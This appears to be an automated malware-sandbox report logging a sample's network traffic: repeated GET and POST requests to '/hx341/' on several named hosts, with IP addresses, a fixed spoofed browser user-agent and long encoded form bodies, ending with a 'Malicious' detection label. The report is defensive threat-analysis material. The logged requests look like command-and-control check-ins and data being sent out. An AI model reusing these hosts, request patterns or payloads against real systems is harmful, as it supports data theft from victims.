User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.georgebillions.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

BZR8IL=V3cN(nQC75Gsmmu8MCnqbngb3aSojDEdSqK8w2nALg7WhgPR4V6kvDHT3qNf(-9ayRQm6p0SkajI3hIA787QqtABmrmmzV(u6drqX7zNqz5POEtFP8fkGrJxNCZOTbcvqFdCmWixqGkBXn8kyy6zCLj4lGQY1K1mrVHwqOPkvWfXyn8a053hfocrzObUG9X7~ISERW9VfStijo2AlUmCNtAwYH2hqxZPzQG8GCgebSXbEijqG20B8TBGKsi71YBuaCyHWua2x1VT(lJNjxDMgKEi651MAYloRVvI(st39VjEqwuH7Wnakjmy1PNWgCfu1S4c~VXoRgNENokG4jPGgtx62U(rj3X4LQq-JTLZtSvXpprMDRa4TFq25g8o3Uis9wnRUUseYcld1CGLuI8l9IDWGkiq8Yo5WAS7Uw5pdyHJ~lhXSzLlpRvL~j6kLPjV0FPhXAK3BmXvW6PsnI5gJKcIVI1NzmUiA1Fv6ivK3D0i3PNpuKU1QAM3EBzgDXeYfikgehRuwpFzyFYDU8DjkcNeQ2CSc4EN3DiyJokX~pckJWd1KeHszuLIYKsWwWoCnQUaK5hK83e0rZme2sIBpYC7pwE7dH16aR0AyEbk3kBefkOsu6HluEhOgeQ4CQKr8q7b2EvZwNvQGWRbvMEN01wutJo-LPgTayafYfxI1_iW0mafEQuPP6(6vj5BcUtniZjppEhpzZW_g7nL3y61oJF-1TDFSptieJc9rK6ak-MDhBTOhI3WPkvFgfqMbOZrUj1B9NkSDm1vWv8KGdSqoeJ-a0SF4EB9w1OtOdt7lkbnNRyUp-2ysxQHMFnq8gekHDQa~-0nlywbOnDNxgQTud~vKGpdOWkPCVcUbk5ZaTxYUZwBjwN8oYBdM854I9t1t2I0v_h7ejztm5Di6J5_MXfQm0(d31mI0so3vfcKmXudbcirz5QpT1he6tLSwGDAewzekdxIarWUrQtUAgIAjQcvut28xTuMHQeBhTgY3xY7ewY_qYHxZVfGa9bzWYqRRB6WLmn9Wl5y7X7zxj1yYnbEagA-dpTIHqGkrFkOYh9RnY26Qcl5r9eEBxmMWmc_(pocnneMWytAeRlyMFYtW8nsXVNh~6oQJWBm~rDQFQQjZB19Smez~xFQkzOnoR084ACx(efBBW~prv21la(9jtuQ3mk7u5qSH0RfmYmbmhZibtEyGgWOY4m13gPj4rqwQb58jmf51Nbhbnily_1bwMPSJ9OqL25qdkOaWonVuEby9o5upN~A0qgMGYspUy0s4J1m59dM3p2FJjaFLeusccE3(yRg9VKaTiYJoJkcDcXo18Ifqw~dGB~DyS(2bYL6JCoCL1KJ9Pdnehshs8DOxEmFX8P9S6po3keTFTfLsl8cfjDGEAk5sXrBOreINeNV(2rMUMPvrMtGNOJscHdMgq1YSjT7KJqDvyeXFRf7m2F-QgNnPn1nBC6-9SumYcmGDR4weQJdnbJmEoIdBIwr5weCQjUkqSruC1acjHgzUpAhmUFFr57Q0-DKcgp1BMBSmZ1kXyC8ELzM7kptpq3MBzswCwYjL1j60F51HqNA7EV-OFr_WMw_qhVZzITz6FHXna7USEZuFaO0MPwNt038AN5SYUYnQeGvIVjcL_b-U_s5lRfeF98Nw889T9aEyL0ddXMfCUkNNrjBI8orUvB-er8fN_RVNeGTRYT1Y5h8muze1dc9nlg2AP2oC6XDkqEHCNg3kE75H1ZfaaQfn-B4ma~1Fi5V59D8iOXMk-kUxSJ82sZ3Wr1p6K~XypTpWHuN3Ih80UBZjEkgSyqTnCEA7nyq(oYJPPPAOaBtTCZSGyB26vdq~dKqHrtb1ujbo5gppN3mYPTXNT~mCjD4OnyCdTtrgB1nncVeyo(04GNyEEXLhiv91H9sPDv3fm8e~QqS3cCSk2CDbPE-dXu8MPus8MJyME(wko1l90epp73mGOoYH9ZG2xE_LuCnaGsY6txcCUUMmn2Mvj5dqSvOBEqRTQPBqkUAQ5xoqdIyv-AuV62s3fBOFe(Qeg3uzYSu~vhC4_6sra7LycRm4u86IM4nW7lnoi6D0TQ1hBbs7gd_vH3htfVz4iA6pInTV-PvqAOAFb0s2EHiR077396BHB~Msnj3vabFI8sRJXxNlqLVaPKNqX4l0su7CQPJc_zWtbvB1TBdGDLwQO(vXLQ_iMY72999w2DbmpLErORFXkM33ntbFazREIHu0IU4yG3jnUncnXzActcZKtojcWYJxZy58Jirw67VTFAS2-6EReLbSuH4yMpBD4BMy30qVqnH~dH4l9~THzKjYLzQRVnZWJVN8KIs1HC7vOkzunSaj5lBdiLDZXdCwH0G7BU6G-BsHrRPPLsXZA6VD9vOCnDve4pW7u

http://www.dummdum.com/hx341/?BZR8IL=VfoEWrNHh2nOP0kuS3jskkX1jzwFGtTp145q8Ia3x1foM7fmX5iRWtJv0P8J0NEqWl1w4UCC&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=VfoEWrNHh2nOP0kuS3jskkX1jzwFGtTp145q8Ia3x1foM7fmX5iRWtJv0P8J0NEqWl1w4UCC&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.dummdum.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.dummdum.com/hx341/
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.dummdum.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.dummdum.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dummdum.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

BZR8IL=d9k-IMEC22zAbyYadyLxkjvgpCY4MNbuhtEZ3JCv61(8Ir(0VvSCAJIPsoknm9MMP0tY5jOIuXVwC_9LmumDka93i6SBSy9hMtl8KL0cRUu6L894DkDvK2Z27SlGhcGmbOB9qMa3HzjsdDvIw7KWO-9T9i~QHDWyGRQUN-P0x93tUnC83luwQC7yKSdWk20_SrDlxQYMlqNutXMKDf2B(zxZ3bDbhE4GCF7j~v2_pQinyUDyd0~OCZI6adCX51FJW0H-ZfGisX5mAmyMe65jSqMgdRJveSqLwACX5HCRZf1oqyEbozMV52ZsMoSSqqNFblFCs7FMNadCxV0mMrBbSHxFuZxXpEcgRv4p8WqCBSFOCD79ztYP6t9iUj8ekYEWYJLl~JNxFksO5rfks8d7FuEKNwUME9ONq9zlnxI2FuDwbAi9QLG-Il3PTokjbtgL4qPciCtSA9lK(s1DLOe8BmJNRlG8lXo7HJLcqTF6UbNhekLEhWQSLzqYm6N7huY093yVyiVLATk1G1XpKN8OauF0ibSEbXqKhi4JAlQ49Yfbm-r2yztTJOg8CQQ_X_Hne6cVPowoAqJWtQrX~LzRyLJrc9Ajo1J9pPjSWf7M~VG1JnyJZrhTxWHJzatC5zJyh7weV8c37KIvw365FV45g5d5xqhNug62VYjrsGTfsVKf8Z6-DNo2BUPbJnMo2OvgDEhiwxeBBFldD-mUbAMpecbaxlGF2miFT7aeKm0SqNxF8uugSNL1UnM045m96fv4FXRNid25YwoB6qzH6BPBqXseECkBnKkqt2Lu6hMoOQU6gbdt0LloWdJDwx8leN4zdqcZIOPNGYy3FTjjWATqM3teiIEdBSO25siOQXnlUudmZ_nUeE2Y0rsSMJnCUaxrTthTBpZ-QLqRdHKtb-kR~6fkV_0ww5fwR8NExOZgE8m8PRQzPfk7p82zhaTAi3ZdCh1Zm2OoA0MZV_bldy0gmDuFjZkCUG5FyRuUe2pz(qIxpbQCirB0gsMJJU1bRyNXEixATG6pnQjF~Ew7ODaZVMhkoxUiN2ochrFPL6MErYN4nHHZ3bQ_TqQhWV8LI7woNCu4JzqyGPYbHOAdYmCyjYAyp6fu2F32CPF0uNKJamUliomEODblFdaH(Cqi6y6RFZi7KMTEp8Q7a2HM2JdXe2k_D-wpVNVbs-ZU8k65YWQCQfcH4TsPkqCX5TfqVCZ-DLVUoSsCr-24nLk4fF5UMr8Q6stNoFcNrm7ATPWO7zZ0tJLN7V2z~9iGcY17ZgBDau7289c0bRXA505UEOzfZxGqupQWijLVBfLw4g1cFEMN8AJNEXzg2dUZVr02xLmWfu7Zj4T2aEZ1h0PtbDwNQWKAbi0q9Q7Kke3prQ4AYSVopr7IF7pinIh1CWsNXdllHQglHfXpe4By93DNiudwoJx5NALX1IDYSj9wYB3q4JmoCACCIkwJD9jFYxRs(gcsM9huI73EGgxUceZfAoRZJQEhnIYKN3kAOBMhqFrv9Xp5JsHlG3CyCzC6EIJQt0qK2BhtNjKQJlCjEVXhAHlEedIXttEmLxuWio~djKvJDYUtQg4fTN63BV182ojJCEI5gOkqnYHD~n05MUH5D8eiLuCKGOnQ4BT_Lsq0lQZP9N4nFIzFWikl6FXf5HkKwhVdTUI8xc3PtSw5HMGVvxdPosJLhzjBamkRCRRX7O3hVJiGhW2PuU5LgIou~UlyZnpV9RVzJwrG1MZ7RvcqBS5VRPaXdFa3M_j7N4BM1H28KVp4ml3HyoRtJ2TMiizkUIack7yt3x7qD078oRBkYDPSUmPmztbKqIEefbCGx9eKrIfNSFFHfwNE~By8yCaRhMumB8f79QEnHmQ1fstjxEWJ5doWBGA5wYm_UvMktFsFnwIZ0gIf(cLC3iBS6VHjCuGku55PguPCIA1gmbQZhH4dNo9DOhpaQebzXqiylqdU~xjKj-GnqO8F4rXcaXLMPs65eir33grhCSt66WWW4j1uvZowMIxHvIOPrIruxB8hmD6DwC(C5g8CUI~JhdQBe12nFPQpA1otw4iIvu6WSIIK2sy6LD9VDqb35J4I0Zlni7LKf_4NI1fNnY0z5l6cLK4wcG3mJ_wXApz65fuU7eG_ixhD6c0GrCaKqydMlhe9HXnOAJCGPAENYzQFkEqbdblpNC9SUZbZ~11n\x00bpr0ksb

http://www.dummdum.com/hx341/
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.dummdum.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.dummdum.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dummdum.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

BZR8IL=d9k-IN8W3GndQUklZ3ms5S~SjScyQvL7oeM03NGrxUvIDon0A8qBIJIM74koi9wkGE1q5hjduXdzN-tOy7Lbuq5buauYWw1gNPZaBeIcMUa4PqpZFQTzVGtojDNNoKLyass0tN7gDzbdESuvxZ7ET-ZSoT6WHgimIwQMBanr4cCuFkma3gPGZinhFxNt43FCWovliQQmtJ1s0lECT4iw3g5w(7TYv0YBOgnowuyuvVer6mrgbUK7PoYXT-y45loJX2j2HO6zgF0pYCm4fbtrS6cKaW1vLzKN3CqfnXDYV_NshSEJozIN5GcVCITZlIZveFNgmZtcNuBCyzY1Kt9uOXxzjodmt2I7Rvo1~miCAWpOFnfi~NYP1N9aUj8WkYErYPXx(JVxUUgM4YXutqtDBOE8M0gZTtjSq6(9nSM2J_3_RCL6Y6G5DA(laIszbts47vjq1yh5B9lN3_QJcc3jISNaZECHnnsdApvDq0p2Fst1SAjU318GLGGB0Khjv_1Asn3i0DJFIxEvGjy4Js4kEfoQ2LvfRzvolQUkPWNh17nxiempk2kKYaEta1I5HMPmYJcWH7wtDqFJpj~n~svz3ZhPKMsO3hNb88~tcdbh0SOMA1SRb7dw0wLrqsl2~SR30P8EQaA6wNF_k0nKH0tc9u8Mw-4ethCDfYGD93(umSztn4Ocbu9TG0uwL00e3vHAPFYW2R2ASnJ4CsbnUXl3Yr2K8V2e1RuoT7SsLWgS49dF4tGjWej4cXMy2Zmp1_jgFUhrjdy5eAYD7obd~R7m0nsWCDoejKEbt1n67hBVKWA52pEq1LljQ8k9nBA8QsIZdaIJa_zkAeHwAALmTivtI2M1ho5SIHnU2NeMeEugcLkpFMq2cF~Q~IUhVdqGeuBEA_4KF58DboyWEkCfbfs48_bfMIoVxqXcWMEUxutCNujldTkePPIjtty40-HcwFtRHSRa9EzzMiQGS-3vKRIJq2amj5wgLS0FpymCN1Ze9cYQ5O8U(exftOMvJ2YjADVdIyF3YQ2KlBne4VoHFT~hcexp7xQpK0U8v4UbJIdqppEIg0rxr7tzRJg5GwMmTpA4EVy5PF~vHuBlF7huD0eWhfsHlLnL8Xe3CNsNuseJX2slj_yEUQSZYfuV(1qSzDOMO7m9Jt(brvoye3rR9MxzP1AFJs8Sfu4dsPhc0z3DYUwCQ8Y49yxt1YmA~yX2TWlPH5xm8yo_msutlMILcDJrVpdM8OoTpVsAgmG7SJD21C1OvqLY6QiUntXYQJNHfgkDFdjk3topP2TUiThSD_GcMg(Dmu45tgnjXOi68CkgTVUDgy9QXiX2jq00WY9nj4K2IuHutYnsAlMKkU75QnYpMF~1V18a~C(auqzorzYdfAhwk4GKaZJFmpo1XSYCRuQvAhlRWdXIWbNc4HH0lO0wnYJPAW6K4NfvFzhYTzjW5Z(1Si2PL3BaE9jYThpGpSssM8JqF4LRHTFNdKNqDtlgdgssrqhlO1AgXRwcgwiC804iGtHDPn6QJSyMJrd-6xKLzAFTMVS8JXL0LkrhTHEgX_gJ8-0qVRf3qL~roqPBDagqQBBfLN~ONVhlwoCoHnFNrusltMb7xTJeHHv5HNC-S5zTKr3g5C77Cufihi1p99lmVKHZRDELmkDFzGNPm3RYFkdRy8yu3lA1M-~WixgBgosogDjLYHAoChVB7MnAX6aBhS6M6UR6ga4erF1PYi1j~ClbGzjCsOZkLegTQBgBcbK_Wn~_C6LZKbVwzH6HLnQkjyqm8-E2LAbZtz7DFrqY8ZWD9TjHFz7FmTVfZBHFdG7t0_bt46IgcfOYqOnwnr2bEnZTYxhFxBu2(Aq0rcCpYdnJvDwgUlE1aJhkxkKX89AAfWtdt8Tee6we420UnVk22RAC(cDm(yBg52mEKNvShe5R4frgDxJRhYIbvhgdCq51LQRzVd3YQqalx6VnsCfPl83BgfwtzbDzbnjtKtGGBRbqyjHjNhJzjmCA5hxZlb5Zf58qvIWc26vDghwo6Amu9QjE(xxUSp6tisYtB0reLuEIDF0jz86hhLe0aI8NguyrLx1rHq7T~qxL48x_7JP5VOUqL03NvZB7vEXmNZo4XR3VNOE8f8DPupuwzPqIvhVI5b53jlys~Q4MkDW0Cw75AuWAbEE1LTBOiyC7RftTITEbNMnN(SYw4NGdLHN4ytVjJzMzBc5FI_r-qt7Dv77nOsITBkmAMO1UWrZggdvh91hzlG6BvCvB5LVbiIwdjaMMutwQmkfCfL0YNYnKfqTaaLsoissOhWRZBp(DJ0OgTlhkPJSiL4Rz0SYu9SOdzpDkLwVnqiwgMedl0rW-TiiFKRO5rDmRB1h2xjsnQpPOx_ZMiC8WyERozePKs6TbHr7HZatMALCWtrf-uJvVpBf

http://www.self90.com/hx341/?BZR8IL=3NNdf/G5nckVFT7smik8PvBazO72+VnkCvfvxor92AU3NUzmpy7cBOD6ixld4E9yVmNQqcKt&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=3NNdf/G5nckVFT7smik8PvBazO72+VnkCvfvxor92AU3NUzmpy7cBOD6ixld4E9yVmNQqcKt&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.self90.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.self90.com/hx341/
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.self90.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.self90.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.self90.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

BZR8IL=(vBnBae77Nccb1jg7VMiaIBgwPbhxF6uaLGKzYzQ~TYrLFDNkW3nVbP1lWE5mnYUMCVkroXn(_POt3NUuNI4K7~AOo9oJE7p9tN529J30qLhSM0_7-W7cg~R4wanrZ3D0E0QeWn7CKbAqYS1OPsYdEOWNsoXNvyluLsWZv15Mii0ZaRPcByPEbnUNFrhb52-T2HyLN6700xXY9qG8LEVidUp67iCvyyeKJAa1OK3R8klD9YjQK6-r9P0yx80uA8Tk1FCX9rdpSc8fur3q1nWHOJ0~NPHC2MSY_80QGvyayAu03ssiQy_4gjNKpBo84mJ2Drhr_fOC5Qmf_xbH2QuURTvVqKhSa7fES9zeTrxOfBRn8aLtEsVEv0Z~I7NeYBaWd3dUUirBV2UdyYylhpKxmKIjeQizf5PspvA2nQTMZwEdj(YqcVSyO8I(NDKrrydzblMVPV77P2l03XHyZcE7YNcMvKXMamTIRBMyr(9Z1Tv3gSJT0c1Fz3igu5K7mCk0boBntM5CfztF7fopt1Ev6DhG-rPGzZRXHa6vuM2HBWOZENK4T9ge0IVQEI3TEbsQQzycCCObTM6mFd3NcKWTo1Ov3hOCf7ZGxn6s6DcczCkm8e7c-Kz8r968odw(lHN5gVGHS97nxwAzoiA1iet8FEJdRHLpvSSiIlKRjSDx02dkvRHzMCo32UmVemmNIIIPNm9Y23PiaXWjuHr~UmncCavp94Ea_n65Ln-E_yOKW(SPMes7a~s5FrmRVmNxTTjME31LLCduEGz6HYn5YAeBmWe9YN51lPc4rPAtbIVcgCAybUQmk99lXsgVjoZG7rAxe8JAWoKDs1kE1sD0IaSZ2BQsTYgGTWcbBaA5IL4ZeIg05~jFzGf9dLTAhk0qASIz10lbjN_x66rphCjgd~IaUfNELEqWtvwPTaVoioedvzpIFBRElZCR0omWPmIcj3w4uLZPDDT0HA_vf6XrbjYwEMW~pdCyCtxZcagJgg4vE8bLkmYLsfJLaG7A4tmA87FRzVxMy7lMJInmsLoHUp8sWgM~CStG1VprSZoRFQ4SDhH5VCj4FPfVTIxg0EmHaIhhkO5vI~FcXeZItAtjh8WVsYsofuAO3uNzwrxuJecbXMyj8IMKnfOYzvnQsx9r5KLfFrP4fTKx-aT~BiLjw3aejp75O6yIfbUoe7mqvmcl1zfMlciA9pZFRPSNfX1Ev11VyUKrVk5hg0QERdMMZhYZ6JCnA7KrPy3IpKYGpfSCcxYz3EbSLLBi9OaUWMAo-lFSgYgYk(k81mlkxZBXWRQ4KBIshGr1GPPBKHa8uZpxBYuHWQwVhTd4New1lvkLMaXv0M7Y1aLG8UJMo1EzJXRLwiEGmKaLFAmQcxUnXELsb6RLZbxW1khCkfzW8NUsd2IL_Gtz9RFDHGcYlW44YAFHVxVGBWFCe5S4MMKrNJR1x9EdNV6NId-Q1oeO6sgVx5TfvWn8VcuorDPOwW4OoCLbYqktM(na_8BUVuALWGdmFNsAFTtFDHLJRgm9xb15R0q0rp3m2DiJQFrOhtmTAdYuaA2nm5ymuYA(Xdr9zaM5bxbIjdVFS~PQCUFMfk6WyyFV1JUqGuh3wNKoKIKSbSYCKV3Zh7xabbwQeC5~NYQ1C1G4tMa9zhIsZx1ugUknJI9drV_RakodzLbosGGJ5RvI3~SFc9MWcYpIlA1TeI8pI~rJu2-kg8624(SASulhWvgWX53GkTvX1Ty73ef(VP5o05RpI6VNrtFCVLnWizyMvE2x2ZLFpt0L5ONnxplZcCYH1Q_VoVdqpoV6-1RoooQMLc9S9eYxiBrbv8VuPN9wkfH~1G-vov4VmQRQNvj7n0xzDFVZZnM2GbyA7G38NNPH2S2c9bMkCXofegQKqgpjoz7O9CPdqa1i3CnKpPrXCumErg5V7Vt70lu7GrdDqqPBLNjKgidUX(d4L0lo27XLiiQhk4c7S4o~1wtgDHc~IBjIXC4mACZ8DpSuWF4G-xAUhTEQO5-wTFUodANoGPvmzcyfDklXBDmqqVGJV1JrCKz3k1ZhfH4bUZgG431t1xQC1mOcpO53ve_cUE5WmfC2S4mgfBYA9EnjBuG184_xW~oEUnO2A910CSb3zVjnHe3IDelS6yGMz7rUGA1ixkdDPINs8aoQAlwMOxX0EryGZ3dC_MGVi8W0C4R\x001n\x00bpr0

http://www.self90.com/hx341/
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.self90.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.self90.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.self90.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

BZR8IL=(vBnBfjA5-w3f3KasHl5UIxZkvP_43bcVJOgzZDqzyJ0dUzNiTbsfbP0jWE4inFtF0QrrpjB(_XNi1ld~fh4W768BIpLNC(qsOxlz8B3waPjc-Mk9cinAwST2UOUlOCV0m4UJmHHU4LbhZT7PsMEAkaXGN8ZKMm2juYOWOdmGHCyONlHcAGyeovpVSPaFYGUEgnyJ9CrgkRRUdLbx8oGzeN9yfnIwTTWJMVB6P~MC9cpU-QbSq~liOWk(ScbuT4wnwtaY8XmvhwKKuLPrWLeHe5S2sXHVWsYMaoCUmvOcyJv9Xs6iTeJ2y~0PpBUjueW9CDpldGFCN0mZt5IQgMrYxSxLOmyVqXYEStnejTxPZ5RicKUrEsVOP0H~I7VeYBjWbTRVU6rWGiSdEMCj3J-(mK-zNJlkuR0surT2EUTPpELXivD7dUEqbcYxrbarr2uyfhYfNBq6P2m8nLU2dImyqEWAIfhKqy5PxVJyIvpYyz7iTv8CWwhEiHFqIMf(WvQ16M3gMgREe7nEI3IqMhQhaPeNdeEDyp-GimHgfIcJkLUGUxdv185YVQIUx45DxHXYDS6ImGXYSwutUgFJLW8X6d25HV4Ab(BIz30(Nu4L1advvuZBfmQq412zroN5EzChxlEDEgbtyo1(bT95nORykE1ShbisurA99cmCR3r2USkwqoY4PWDzVcQWMuQMtUwHNeCeRDSlLSolbnX7n7DURKK29oMaPXH5LvIYf2OLXLSLPmv75mV31rgf1mR(zOZMGHpZ7WdmWux7Eg9zvIpMGWW(d96(Eik4ojUsa1gYleDnr14lk9jkzoLcCUqIa7mxOxUb08aBut0UyYCkamVInh6uzd8MCqSDUSGnvHoBvQ8qpqsDyeHw-jCbVsv9hXAjUEpNDhs6Yigi3XGh822FkShYZNrWb6IcTi0qBk8IMn7dQQGC1taWlxgWcrfTnvsp62YDnjF4XEguafm6MDxjF0P~JYjwANoSPSmLW0j8nN5HhKODNziPYmBRqBQXOLLdisCZ1HgKOoeh7ebVHlEkFwotjmMF3pJug5LdXANTQN-3AS56ViAYUdUpGpGfrQxp2G4nauIRW3jE_8RnEMycMgdqKzFEUGTzx7XuoacXHEyir0MSTTzFSj1Q-kaiJ~GYGvR76HZzIWK6DnN1FDuYxdG9_u7B83_vojusZy7l3DfPG5YWs0JKwCEEfvxF89iDUEew1xbmQkKNx0sQoFnSPVWqVrxqfj7GZmWW72sFJBu0W9BTNfmk97HNWFzkehYJDRlQ1Ll3GeLsjVHAHkTh7lqnjbp3g(HRpHdh7dKnS4GI01YRwCIwNiRzUO1AaqnqEhJCE~3LtAvTc9Q4ov5VkH-Ykv3UjYMaslJnyBNho(cCKmpVn0dCAq2TtsDtuDAPODZ~rFoaUq2V1Sj47RBIFtjKjTYbvpVxswitZJh2hVuRPg2Kb9AT1pSEqUONDJTfvOr(BN6paDJAC~vebyqS5ylnqrfZ6VeeGSPdDODll0rbyPLajPpeAQ2sAWWyAwtibNZkEjzIidXaC5mVg8nx-cW1WQzp_oi30Nn43uE5ZVcJAd0OS6IJWIYfOFbTSmWeVxbnX3cu1wZmYwKcJmHNpBdXAXBbYD0XITh68d30ypSwf4G7SB-w4lzqBM0wax5MdJbT6oVQ13X4Ou3NZc3CzawCs9WR_1JZE8jTcYZub3tJrS9uSN62LvUZGLTzBvSVE5bVXbrcmjx1iDru1(aswI4sLOjNK8iAEXbeAmKNbAemR91AbUqJKKclF8nbviUcUNFRthgspdogoZQmLAHW7AmfJGRyBtZYuUh5eMa(G3sowrPstX9fS4XO5C3vDMu4WxnV5XL3yDyEZiw7tAANyqaf5647HqdO74AIIISiNHUJM7Ndqi_73CvJL~aPU7aPJFicaRTjQ0K4H7ffKiPYZ4IOQ6gfAmz1rt04GTkKBeR23IesSU2r108gw3xysFqHxa1jBWbghNTiWBMH9pdOw6RWqpWwW4Qm_kw(Hyltj0fZ0kvWUaCqJpMOktfoRObzlQ1gOiHcWUYIZq5oV1TUnXUb-iLhe~bc0odRk(wxDV2ovc4fI4noCyfhdkQ8l~aAjPt3RIDwg2uywZHvXCAHTqXX5SsOx(gMncijUgoGvpPtbOmHghbeeg94BLYAe3LPJBpXHs90UkchychzTo9bNxCUufyl12yy4zKrLarXQkw788HnwqhVTND1ijMeXYBPLMKpRcRp33jlzKRNuuvK4kKyY~6BwMDgWclWTzhGYEBogefzPuw~PIGfGP3h7~Nf6Gn3CSjEvQnap2a0YPYuvg6Pm6ZlgQLNxwBGXRJZa6f24PvxxD4ygnG9pkK9GSJPFb90a1hJAoOUceU794qvrbliGApVdmCKNL3z8lg81Jjbt

#infosec #automation

TheSystem Itself @ 2018-06-06 19:57:19

Detected family: #Malicious

TheSystem Itself @ 2018-06-06 20:06:02